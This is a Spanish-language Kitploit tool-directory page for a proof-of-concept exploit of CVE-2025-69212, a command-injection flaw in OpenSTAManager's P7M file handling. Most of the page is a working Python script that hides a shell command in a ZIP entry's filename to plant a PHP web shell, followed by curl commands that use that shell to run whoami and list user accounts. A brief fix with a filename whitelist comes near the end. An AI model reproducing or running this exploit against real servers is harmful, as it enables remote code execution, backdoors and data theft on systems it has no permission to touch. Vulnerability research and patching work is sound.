Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
OpenSTA-Exploit — Prueba de concepto (PoC) del CVE-2025-69212 relacionado con el procesamiento de archivos P7M | Kitploit
Herramientas/GitHubGitHub/lolw0/opensta-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHublolw0/opensta-exploit

OpenSTA-Exploit

Prueba de concepto (PoC) del CVE-2025-69212 relacionado con el procesamiento de archivos P7M

Ver Repositorio
hace 7 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OpenSTA-Exploit

imagen

DatosDetalle
ID de CVECVE-2025-69212
Gravedadcritical (9.4)
CWE78: Neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo
Versiones afectadasOpenSTAManager <= 2.9.8
Vector de ataquesubir un archivo ZIP que contiene un archivo .p7m con un nombre de archivo malicioso
AutenticaciónRequerida
Impactoejecutar comandos arbitrarios del sistema en el servidor

Explicación del exploit

  1. Almacena un comando shell en la variable cmd (que crea un archivo llamado SHELL.php que contiene código PHP que puede ejecutar comandos).
  2. Construye un nombre de archivo especialmente diseñado que oculta el comando de la variable cmd y lo guarda en la variable malicious_file.
  3. Crea un nuevo archivo ZIP llamado exploit.zip y lo abre para escritura.
  4. Añade un archivo al ZIP. Su nombre de archivo es la variable malicious_file.
  5. El nombre de archivo malicioso se inyecta en el comando exec().

PoC (Prueba de concepto)

1. Crear archivo zip para inyectar

root@kitploit:~
import zipfile
import time

print("Creating zip file...")
time.sleep(1)

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_file = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    zf.writestr(malicious_file, b"")

2. Ejecutar archivo y subirlo

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ python3 exploit.py
Creating zip file...
lolw0@sys:~/OpenSTA-Exploit$ ls
-rw-rw-r 2 lolw0 lolw0 281 Aug 10 22:36 exploit.zip
imagen

imagen

3. Resultado del exploit

El análisis XML falla después de la ejecución del comando

root@kitploit:~
HTTP/1.1 500 Internal Server Error

"error":{
"type":"Exception",
"message":"Start tag expected, '<' not found\n",
"code":0,
"file":"\/var\/www\/html\/openstamanager\/src\/Util\/XML.php",
"line":51}

3. Verificación y ejecución remota de código

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ curl "http://localhost:8080/files/SHELL.php?c=whoami"

www-data

lolw0@sys:~/OpenSTA-Exploit$ curl -s --get \ --data-urlencode 'c=getent passwd | grep -E "/home|/bin/bash|/bin/sh"' \
'http://localhost:8080/files/SHELL.php'

root:x:0:0:root:/root:/bin/bash
xxxx:x:1001:1001:,,,:/home/xxxx:/usr/sbin/nologin
yyyy:x:1002:1002:,,,:/home/yyyy:/usr/sbin/nologin
zzzz:x:1003:1003:,,,:/home/zzzz:/usr/sbin/nologin



Conduce a...


Solución

una solución sencilla es validar los nombres de archivo antes de procesarlos (solo permitir caracteres alfanuméricos, puntos, guiones y guiones bajos para omitir nombres de archivo no válidos)

root@kitploit:~
foreach ($files_xml as $xml) {
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
        continue; 
    }
    if (string_ends_with($xml, '.p7m')) {
        $file = XML::decodeP7M($directory.'/'.$xml);
    }
}

(o simplemente puedes actualizar lol)

Descargar herramienta
AtaqueDetalle
Ejecución remota de códigoCompromiso total del servidor con ejecución de comandos
Exfiltración de datosAcceso a todos los datos de la aplicación y a la base de datos
Escalada de privilegiosPosible escalada si el servidor web se ejecuta con privilegios elevados o es vulnerable
PersistenciaInstalar puertas traseras y mantener el acceso con el tiempo
Movimiento lateralMoverse a otros sistemas/usuarios de la red